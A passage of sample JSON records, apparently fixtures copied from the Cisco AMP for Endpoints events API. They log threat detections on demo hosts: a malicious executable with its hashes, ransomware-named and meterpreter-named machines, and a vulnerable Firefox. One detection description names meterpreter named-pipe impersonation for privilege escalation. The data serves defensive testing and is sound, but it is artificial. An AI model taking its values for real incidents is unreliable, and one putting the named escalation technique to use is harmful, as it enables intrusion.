Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 